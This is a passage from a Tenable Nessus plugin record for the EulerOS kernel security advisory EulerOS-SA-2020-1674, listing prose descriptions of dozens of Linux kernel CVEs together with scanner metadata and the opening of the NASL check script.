set_fdc in\n drivers/block/floppy.c leads to a wait_til_ready\n out-of-bounds read because the FDC index is not checked\n for errors before assigning it, aka\n CID-2e90ca68b0d2.(CVE-2020-9383)ext4_protect_reserved_i\n node in fs/ext4/block_validity.c in the Linux kernel\n through 5.5.3 allows attackers to cause a denial of\n service (soft lockup) via a crafted journal\n size.(CVE-2020-8992)Wi-Fi Protected Access (WPA and\n WPA2) allows reinstallation of the Group Temporal Key\n (GTK) during the group key handshake, allowing an\n attacker within radio range to replay frames from\n access points to clients.(CVE-2017-13080)Linux Kernel\n version 3.18 to 4.16 incorrectly handles an SG_IO ioctl\n on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and\n an empty 6-byte cmdp. This may lead to copying up to\n 1000 kernel heap pages to the userspace. This has been\n fixed upstream in\n https://github.com/torvalds/linux/commit/a45b599ad808c3\n c982fdcdc12b0b8611c2f92824 already. The problem has\n limited scope, as users don't usually have permissions\n to access SCSI devices. On the other hand, e.g. the\n Nero user manual suggests doing `chmod o+r+w /dev/sg*`\n to make the devices accessible. NOTE: third parties\n dispute the relevance of this report, noting that the\n requirement for an attacker to have both the\n CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it\n 'virtually impossible to exploit.'(CVE-2018-1000204)The\n Linux kernel through 5.3.13 has a start_offset+size\n Integer Overflow in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. 
This allows local users\n (with /dev/video0 access) to obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)arch/x86/kvm/emulate.c in\n the Linux kernel before 4.8.12 does not properly\n initialize Code Segment (CS) in certain error cases,\n which allows local users to obtain sensitive\n information from kernel stack memory via a crafted\n application.(CVE-2016-9756)Double free vulnerability in\n drivers/ net/usb/cdc_ncm.c in the Linux kernel before\n 4.5 allows physically proximate attackers to cause a\n denial of service (system crash) or possibly have\n unspecified other impact by inserting a USB device with\n an invalid USB descriptor.(CVE-2016-3951)Linux Kernel\n contains an out-of-bounds read flaw in the\n asn1_ber_decoder() function in lib/asn1_decoder.c that\n is triggered when decoding ASN.1 data. This may allow a\n remote attacker to disclose potentially sensitive\n memory contents.(CVE-2018-9383)Linux Kernel contains a\n flaw in the ip6_setup_cork() function in\n net/ipv6/ip6_output.c that is triggered when handling\n too small IPv6 MTU sizes. This may allow a local\n attacker to cause a crash or potentially gain elevated\n privileges.(CVE-2018-9389)In the Android kernel in the\n video driver there is a use after free due to a race\n condition. This could lead to local escalation of\n privilege with no additional execution privileges\n needed. User interaction is not needed for\n exploitation.(CVE-2019-9458)An out-of-bounds memory\n write issue was found in the Linux Kernel, version 3.13\n through 5.4, in the way the Linux kernel's KVM\n hypervisor handled the 'KVM_GET_EMULATED_CPUID'\n ioctl(2) request to get CPUID features emulated by the\n KVM hypervisor. 
A user or process able to access the\n '/dev/kvm' device could use this flaw to crash the\n system, resulting in a denial of\n service.(CVE-2019-19332)kernel/sched/fair.c in the\n Linux kernel before 5.3.9, when cpu.cfs_quota_us is\n used (e.g., with Kubernetes), allows attackers to cause\n a denial of service against non-cpu-bound applications\n by generating a workload that triggers unwanted slice\n expiration, aka CID-de53fd7aedb1. (In other words,\n although this slice expiration would typically be seen\n with benign workloads, it is possible that an attacker\n could calculate how many stray requests are required to\n force an entire Kubernetes cluster into a\n low-performance state caused by slice expiration, and\n ensure that a DDoS attack sent that number of stray\n requests. An attack does not affect the stability of\n the kernel it only causes mismanagement of application\n execution.)(CVE-2019-19922)An exploitable\n denial-of-service vulnerability exists in the Linux\n kernel prior to mainline 5.3. An attacker could exploit\n this vulnerability by triggering AP to send IAPP\n location updates for stations before the required\n authentication process has completed. This could lead\n to different denial-of-service scenarios, either by\n causing CAM table attacks, or by leading to traffic\n flapping if faking already existing clients in other\n nearby APs of the same wireless infrastructure. An\n attacker can forge Authentication and Association\n Request packets to trigger this\n vulnerability.(CVE-2019-5108)A heap-based buffer\n overflow vulnerability was found in the Linux kernel,\n version kernel-2.6.32, in Marvell WiFi chip driver. A\n remote attacker could cause a denial of service (system\n crash) or, possibly execute arbitrary code, when the\n lbs_ibss_join_existing function is called after a STA\n connects to an AP.(CVE-2019-14896)A stack-based buffer\n overflow was found in the Linux kernel, version\n kernel-2.6.32, in Marvell WiFi chip driver. 
An attacker\n is able to cause a denial of service (system crash) or,\n possibly execute arbitrary code, when a STA works in\n IBSS mode (allows connecting stations together without\n the use of an AP) and connects to another\n STA.(CVE-2019-14897)In the Linux kernel through 5.4.6,\n there is a NULL pointer dereference in\n drivers/scsi/libsas/sas_discover.c because of\n mishandling of port disconnection during discovery,\n related to a PHY down race condition, aka\n CID-f70267f379b5.(CVE-2019-19965)In the Linux kernel\n before 5.1.6, there is a use-after-free in cpia2_exit()\n in drivers/media/usb/cpia2/cpia2_v4l.c that will cause\n denial of service, aka\n CID-dea37a972655.(CVE-2019-19966)In the Linux kernel\n before 5.1, there is a memory leak in\n __feat_register_sp() in net/dccp/feat.c, which may\n cause denial of service, aka\n CID-1d3ff0950e2b.(CVE-2019-20096)In the Linux kernel\n before 5.0.6, there is a NULL pointer dereference in\n drop_sysctl_table() in fs/proc/proc_sysctl.c, related\n to put_links, aka\n CID-23da9588037e.(CVE-2019-20054)drivers/\n net/usb/pegasus.c in the Linux kernel 4.9.x before\n 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK\n option, which allows local users to cause a denial of\n service (system crash or memory corruption) or possibly\n have unspecified other impact by leveraging use of more\n than one virtual page for a DMA\n scatterlist.(CVE-2017-8068)A heap-based buffer overflow\n was discovered in the Linux kernel, all versions 3.x.x\n and 4.x.x before 4.18.0, in Marvell WiFi chip driver.\n The flaw could occur when the station attempts a\n connection negotiation during the handling of the\n remote devices country settings. 
This could allow the\n remote device to cause a denial of service (system\n crash) or possibly execute arbitrary\n code.(CVE-2019-14895)The acpi_ds_create_operands()\n function in drivers/acpi/acpica/dsutils.c in the Linux\n kernel through 4.12.9 does not flush the operand cache\n and causes a kernel stack dump, which allows local\n users to obtain sensitive information from kernel\n memory and bypass the KASLR protection mechanism (in\n the kernel through 4.9) via a crafted ACPI\n table.(CVE-2017-13693)Linux kernel CIFS implementation,\n version 4.9.0 is vulnerable to a relative paths\n injection in directory entry lists.(CVE-2019-10220)A\n heap overflow flaw was found in the Linux kernel, all\n versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi\n chip driver. The vulnerability allows a remote attacker\n to cause a system crash, resulting in a denial of\n service, or execute arbitrary code. The highest threat\n with this vulnerability is with the availability of the\n system. If code execution occurs, the code will run\n with the permissions of root. This will affect both\n confidentiality and integrity of files on the\n system.(CVE-2019-14901)In the AppleTalk subsystem in\n the Linux kernel before 5.1, there is a potential NULL\n pointer dereference because register_snap_client may\n return NULL. 
This will lead to denial of service in\n net/appletalk/aarp.c and net/appletalk/ddp.c, as\n demonstrated by unregister_snap_client, aka\n CID-9804501fa122.(CVE-2019-19227)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/usb/class/cdc-acm.c driver, aka\n CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel\n before 5.3.9, there are multiple out-of-bounds write\n bugs that can be caused by a malicious USB device in\n the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c,\n drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c,\n drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c,\n drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)A use-after-free\n in binder.c allows an elevation of privilege from an\n application to the Linux Kernel. 
No user interaction is\n required to exploit this vulnerability, however\n exploitation does require either the installation of a\n malicious local application or a separate vulnerability\n in a network facing application.Product: AndroidAndroid\n ID: A-141720095(CVE-2019-2215)The do_remount function\n in fs/namespace.c in the Linux kernel through 3.16.1\n does not maintain the MNT_LOCK_READONLY bit across a\n remount of a bind mount, which allows local users to\n bypass an intended read-only restriction and defeat\n certain sandbox protection mechanisms via a 'mount -o\n remount' command within a user\n namespace.(CVE-2014-5206)Multiple integer overflows in\n the lzo1x_decompress_safe function in\n lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor\n in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)The\n pivot_root implementation in fs/namespace.c in the\n Linux kernel through 3.17 does not properly interact\n with certain locations of a chroot directory, which\n allows local users to cause a denial of service\n (mount-tree loop) via . (dot) values in both arguments\n to the pivot_root system call.(CVE-2014-7970)A security\n flaw was discovered in nl80211_set_rekey_data()\n function in the Linux kernel since v3.1-rc1 through\n v4.13. 
This function does not check whether the\n required attributes are present in a netlink request.\n This request can be issued by a user with CAP_NET_ADMIN\n privilege and may result in NULL dereference and a\n system crash.(CVE-2017-12153)arch/x86/kernel/entry_32.S\n in the Linux kernel through 3.15.1 on 32-bit x86\n platforms, when syscall auditing is enabled and the sep\n CPU feature flag is set, allows local users to cause a\n denial of service (OOPS and system crash) via an\n invalid syscall number, as demonstrated by number\n 1000.(CVE-2014-4508)fs/namespace.c in the Linux kernel\n through 3.16.1 does not properly restrict clearing\n MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which\n allows local users to gain privileges, interfere with\n backups and auditing on systems that had atime enabled,\n or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)In the Linux kernel before\n 5.3.7, there is a use-after-free bug that can be caused\n by a malicious USB device in the\n drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)In the Linux kernel\n before 5.3.12, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/input/ff-memless.c driver, aka\n CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/hid/usbhid/hiddev.c driver, aka\n CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel\n before 5.3.7, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/iowarrior.c driver, aka\n CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel\n before 5.2.9, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/yurex.c driver, aka\n 
CID-fc05481b2fca.(CVE-2019-19531)In the Linux kernel\n before 5.3.4, there is an info-leak bug that can be\n caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel\n before 5.3.11, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_core.c driver, aka\n CID-f7a1337f0d29..(CVE-2019-19534)In the Linux kernel\n before 5.2.9, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_pro.c driver, aka\n CID-ead16e53c2f0.(CVE-2019-19536)In the Linux kernel\n before 5.2.10, there is a race condition bug that can\n be caused by a malicious USB device in the USB\n character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)A\n memory leak in the cx23888_ir_probe() function in\n drivers/media/pci/cx23885/cx23888-ir.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n kfifo_alloc() failures, aka\n CID-a7b2df76b42b.(CVE-2019-19054)A memory leak in the\n mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in\n the mwifiex_pcie_init_evt_ring() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)A memory leak in the\n adis_update_scan_mode() function in\n drivers/iio/imu/adis_buffer.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption), aka\n 
CID-ab612b1daf41.(CVE-2019-19060)A memory leak in the\n crypto_report() function in crypto/crypto_user_base.c\n in the Linux kernel through 5.3.11 allows attackers to\n cause a denial of service (memory consumption) by\n triggering crypto_report_alg() failures, aka\n CID-ffdde5932042.(CVE-2019-19062)Two memory leaks in\n the rtl_usb_probe() function in drivers/\n net/wireless/realtek/rtlwifi/usb.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)A memory leak in the\n bfad_im_get_stats() function in\n drivers/scsi/bfa/bfad_attr.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n bfa_port_get_stats() failures, aka\n CID-0e62395da2bd.(CVE-2019-19066)Memory leaks in\n drivers/ net/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)A memory leak in the\n ath9k_wmi_cmd() function in drivers/\n net/wireless/ath/ath9k/wmi.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)An issue was\n discovered in fs/xfs/xfs_icache.c in the Linux kernel\n through 4.17.3. There is a NULL pointer dereference and\n panic in lookup_slow() on a NULL inode->i_ops pointer\n when doing pathwalks on a corrupted xfs image. This\n occurs because of a lack of proper validation that\n cached inodes are free during\n allocation.(CVE-2018-13093)An issue was discovered in\n slc_bump in drivers/ net/can/slcan.c in the Linux\n kernel through 5.6.2. 
It allows attackers to read\n uninitialized can_frame data, potentially containing\n sensitive information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)An issue was\n discovered in the Linux kernel through 5.6.2.\n mpol_parse_str in mm/mempolicy.c has a stack-based\n out-of-bounds write because an empty nodelist is\n mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)In the Linux kernel\n before 5.4.12, drivers/input/input.c has out-of-bounds\n writes via a crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)An issue was\n discovered in the Linux kernel before 5.6.1.\n drivers/media/usb/gspca/ov519.c allows NULL pointer\n dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)An issue was\n discovered in the stv06xx subsystem in the Linux kernel\n before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c\n and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)In the Linux kernel\n before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c\n (aka the Xirlink camera USB driver) mishandles invalid\n descriptors, aka CID-a246b4d54770.(CVE-2020-11668)A\n flaw was found in the Linux kernel's implementation of\n GRO. 
This flaw allows an attacker with local access to\n crash the\n system.(CVE-2020-10720)gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)An issue was\n discovered in the Linux kernel through 5.6.11. sg_write\n lacks an sg_remove_request call in a certain failure\n case, aka CID-83c6f2390040.(CVE-2020-12770)A signal\n access-control issue was discovered in the Linux kernel\n before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in\n include/linux/sched.h is only 32 bits, an integer\n overflow can interfere with a do_notify_parent\n protection mechanism. A child process can send an\n arbitrary signal to a parent process in a different\n security domain. Exploitation limitations include the\n amount of elapsed time before an integer overflow\n occurs, and the lack of scenarios where signals to a\n parent process present a substantial operational\n threat.(CVE-2020-12826)The fix for CVE-2019-11599,\n affecting the Linux kernel before 5.0.10 was not\n complete. A local user could use this flaw to obtain\n sensitive information, cause a denial of service, or\n possibly have other unspecified impacts by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-14898)usb_sg_cancel in\n drivers/usb/core/message.c in the Linux kernel before\n 5.6.8 has a use-after-free because a transfer occurs\n without a reference, aka\n CID-056ad39ee925.(CVE-2020-12464)The __mptctl_ioctl\n function in drivers/message/fusion/mptctl.c in the\n Linux kernel before 5.4.14 allows local users to hold\n an incorrect lock during the ioctl operation and\n trigger a race condition, i.e., a 'double fetch'\n vulnerability, aka CID-28d76df18f0a. 
NOTE: the vendor\n states 'The security impact of this bug is not as bad\n as it could have been because these operations are all\n privileged and root already has enormous destructive\n power.'(CVE-2020-12652)An issue was found in Linux\n kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv()\n function in drivers/\n net/wireless/marvell/mwifiex/scan.c allows local users\n to gain privileges or cause a denial of service because\n of an incorrect memcpy and buffer overflow, aka\n CID-b70261a288ea.(CVE-2020-12653)An issue was found in\n Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status()\n in drivers/ net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)An issue was\n discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 6, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-17T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-1674)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19527", "CVE-2020-11494", "CVE-2019-5108", "CVE-2019-19054", "CVE-2020-8992", "CVE-2020-8648", "CVE-2020-12770", "CVE-2020-9383", "CVE-2017-8068", "CVE-2019-19533", "CVE-2017-13080", "CVE-2019-19534", "CVE-2019-19057", "CVE-2014-3180", "CVE-2019-19332", "CVE-2019-14901", "CVE-2017-13693", "CVE-2020-12826", "CVE-2014-4508", "CVE-2019-19524", "CVE-2020-10942", "CVE-2019-14896", "CVE-2019-19062", "CVE-2018-13093", "CVE-2019-19922", "CVE-2020-11609", "CVE-2020-10720", "CVE-2019-20636", "CVE-2019-19523", "CVE-2019-19768", "CVE-2020-12464", "CVE-2014-5206", "CVE-2019-19965", "CVE-2020-12654", "CVE-2018-9389", "CVE-2019-19227", "CVE-2019-19319", "CVE-2019-19531", "CVE-2016-3951", "CVE-2019-10220", "CVE-2019-11599", "CVE-2019-19063", "CVE-2018-1000204", "CVE-2018-9383", "CVE-2019-14895", "CVE-2019-14897", "CVE-2019-19066", "CVE-2020-12653", "CVE-2019-19528", "CVE-2014-4608", "CVE-2020-11608", "CVE-2020-11668", "CVE-2016-9756", "CVE-2019-16230", "CVE-2020-13143", "CVE-2019-9458", "CVE-2017-12153", "CVE-2020-11565", "CVE-2020-8649", "CVE-2019-14898", "CVE-2020-12652", "CVE-2019-2215", "CVE-2019-19073", "CVE-2014-5207", "CVE-2020-8647", "CVE-2019-19530", "CVE-2019-19532", "CVE-2019-19074", "CVE-2019-18675", "CVE-2019-19537", "CVE-2020-2732", "CVE-2019-19966", "CVE-2019-19060", "CVE-2020-12655", "CVE-2019-19056", "CVE-2019-19536", "CVE-2019-20054", "CVE-2014-7970", "CVE-2019-20096"], "modified": "2020-06-17T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:perf", 
"p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1674.NASL", "href": "https://www.tenable.com/plugins/nessus/137516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137516);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-3180\",\n \"CVE-2014-4508\",\n \"CVE-2014-4608\",\n \"CVE-2014-5206\",\n \"CVE-2014-5207\",\n \"CVE-2014-7970\",\n \"CVE-2016-3951\",\n \"CVE-2016-9756\",\n \"CVE-2017-12153\",\n \"CVE-2017-13080\",\n \"CVE-2017-13693\",\n \"CVE-2017-8068\",\n \"CVE-2018-1000204\",\n \"CVE-2018-13093\",\n \"CVE-2018-9383\",\n \"CVE-2018-9389\",\n \"CVE-2019-10220\",\n \"CVE-2019-14895\",\n \"CVE-2019-14896\",\n \"CVE-2019-14897\",\n \"CVE-2019-14898\",\n \"CVE-2019-14901\",\n \"CVE-2019-16230\",\n \"CVE-2019-18675\",\n \"CVE-2019-19054\",\n \"CVE-2019-19056\",\n \"CVE-2019-19057\",\n \"CVE-2019-19060\",\n \"CVE-2019-19062\",\n \"CVE-2019-19063\",\n \"CVE-2019-19066\",\n \"CVE-2019-19073\",\n \"CVE-2019-19074\",\n \"CVE-2019-19227\",\n \"CVE-2019-19319\",\n \"CVE-2019-19332\",\n \"CVE-2019-19523\",\n \"CVE-2019-19524\",\n \"CVE-2019-19527\",\n \"CVE-2019-19528\",\n \"CVE-2019-19530\",\n \"CVE-2019-19531\",\n \"CVE-2019-19532\",\n \"CVE-2019-19533\",\n \"CVE-2019-19534\",\n \"CVE-2019-19536\",\n \"CVE-2019-19537\",\n \"CVE-2019-19768\",\n \"CVE-2019-19922\",\n \"CVE-2019-19965\",\n \"CVE-2019-19966\",\n \"CVE-2019-20054\",\n \"CVE-2019-20096\",\n \"CVE-2019-20636\",\n \"CVE-2019-2215\",\n \"CVE-2019-5108\",\n \"CVE-2019-9458\",\n 
\"CVE-2020-10720\",\n \"CVE-2020-10942\",\n \"CVE-2020-11494\",\n \"CVE-2020-11565\",\n \"CVE-2020-11608\",\n \"CVE-2020-11609\",\n \"CVE-2020-11668\",\n \"CVE-2020-12464\",\n \"CVE-2020-12652\",\n \"CVE-2020-12653\",\n \"CVE-2020-12654\",\n \"CVE-2020-12655\",\n \"CVE-2020-12770\",\n \"CVE-2020-12826\",\n \"CVE-2020-13143\",\n \"CVE-2020-2732\",\n \"CVE-2020-8647\",\n \"CVE-2020-8648\",\n \"CVE-2020-8649\",\n \"CVE-2020-8992\",\n \"CVE-2020-9383\"\n );\n script_bugtraq_id(\n 68126,\n 68214,\n 69214,\n 69216,\n 70319\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-1674)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):In the Linux kernel before\n 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks\n validation of an sk_family field, which might allow\n attackers to trigger kernel stack corruption via\n crafted system calls.(CVE-2020-10942)In the Linux\n kernel 5.0.21, a setxattr operation, after a mount of a\n crafted ext4 image, can cause a slab-out-of-bounds\n write access because of an ext4_xattr_set_entry\n use-after-free in fs/ext4/xattr.c when a large old_size\n value is used in a memset call.(CVE-2019-19319)In\n kernel/compat.c in the Linux kernel before 3.17, as\n used in Google Chrome OS and other products, there is a\n possible out-of-bounds read. 
restart_syscall uses\n uninitialized data when restarting\n compat_sys_nanosleep. NOTE: this is disputed because\n the code path is unreachable.(CVE-2014-3180)In the\n Linux kernel 5.4.0-rc2, there is a use-after-free\n (read) in the __blk_add_trace function in\n kernel/trace/blktrace.c (which is used to fill out a\n blk_io_trace structure and place it in a per-cpu\n sub-buffer).(CVE-2019-19768)There is a use-after-free\n vulnerability in the Linux kernel through 5.5.2 in the\n vc_do_resize function in\n drivers/tty/vt/vt.c.(CVE-2020-8647)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the vgacon_invert_region function in\n drivers/video/console/vgacon.c.(CVE-2020-8649)drivers/g\n pu/drm/radeon/radeon_display.c in the Linux kernel\n 5.2.14 does not check the alloc_workqueue return value,\n leading to a NULL pointer dereference. NOTE: A\n third-party software maintainer states that the work\n queue allocation is happening during device\n initialization, which for a graphics card occurs during\n boot. It is not attacker controllable and OOM at that\n time is highly unlikely.(CVE-2019-16230)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the n_tty_receive_buf_common function\n in drivers/tty/ n_tty.c.(CVE-2020-8648)A flaw was\n discovered in the way that the KVM hypervisor handled\n instruction emulation for an L2 guest when nested\n virtualisation is enabled. Under some circumstances, an\n L2 guest may trick the L0 guest into accessing\n sensitive L1 resources that should be inaccessible to\n the L2 guest.(CVE-2020-2732)An issue was discovered in\n the Linux kernel through 5.5.6. 
set_fdc in\n drivers/block/floppy.c leads to a wait_til_ready\n out-of-bounds read because the FDC index is not checked\n for errors before assigning it, aka\n CID-2e90ca68b0d2.(CVE-2020-9383)ext4_protect_reserved_i\n node in fs/ext4/block_validity.c in the Linux kernel\n through 5.5.3 allows attackers to cause a denial of\n service (soft lockup) via a crafted journal\n size.(CVE-2020-8992)Wi-Fi Protected Access (WPA and\n WPA2) allows reinstallation of the Group Temporal Key\n (GTK) during the group key handshake, allowing an\n attacker within radio range to replay frames from\n access points to clients.(CVE-2017-13080)Linux Kernel\n version 3.18 to 4.16 incorrectly handles an SG_IO ioctl\n on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and\n an empty 6-byte cmdp. This may lead to copying up to\n 1000 kernel heap pages to the userspace. This has been\n fixed upstream in\n https://github.com/torvalds/linux/commit/a45b599ad808c3\n c982fdcdc12b0b8611c2f92824 already. The problem has\n limited scope, as users don't usually have permissions\n to access SCSI devices. On the other hand, e.g. the\n Nero user manual suggests doing `chmod o+r+w /dev/sg*`\n to make the devices accessible. NOTE: third parties\n dispute the relevance of this report, noting that the\n requirement for an attacker to have both the\n CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it\n 'virtually impossible to exploit.'(CVE-2018-1000204)The\n Linux kernel through 5.3.13 has a start_offset+size\n Integer Overflow in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. 
This allows local users\n (with /dev/video0 access) to obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)arch/x86/kvm/emulate.c in\n the Linux kernel before 4.8.12 does not properly\n initialize Code Segment (CS) in certain error cases,\n which allows local users to obtain sensitive\n information from kernel stack memory via a crafted\n application.(CVE-2016-9756)Double free vulnerability in\n drivers/ net/usb/cdc_ncm.c in the Linux kernel before\n 4.5 allows physically proximate attackers to cause a\n denial of service (system crash) or possibly have\n unspecified other impact by inserting a USB device with\n an invalid USB descriptor.(CVE-2016-3951)Linux Kernel\n contains an out-of-bounds read flaw in the\n asn1_ber_decoder() function in lib/asn1_decoder.c that\n is triggered when decoding ASN.1 data. This may allow a\n remote attacker to disclose potentially sensitive\n memory contents.(CVE-2018-9383)Linux Kernel contains a\n flaw in the ip6_setup_cork() function in\n net/ipv6/ip6_output.c that is triggered when handling\n too small IPv6 MTU sizes. This may allow a local\n attacker to cause a crash or potentially gain elevated\n privileges.(CVE-2018-9389)In the Android kernel in the\n video driver there is a use after free due to a race\n condition. This could lead to local escalation of\n privilege with no additional execution privileges\n needed. User interaction is not needed for\n exploitation.(CVE-2019-9458)An out-of-bounds memory\n write issue was found in the Linux Kernel, version 3.13\n through 5.4, in the way the Linux kernel's KVM\n hypervisor handled the 'KVM_GET_EMULATED_CPUID'\n ioctl(2) request to get CPUID features emulated by the\n KVM hypervisor. 
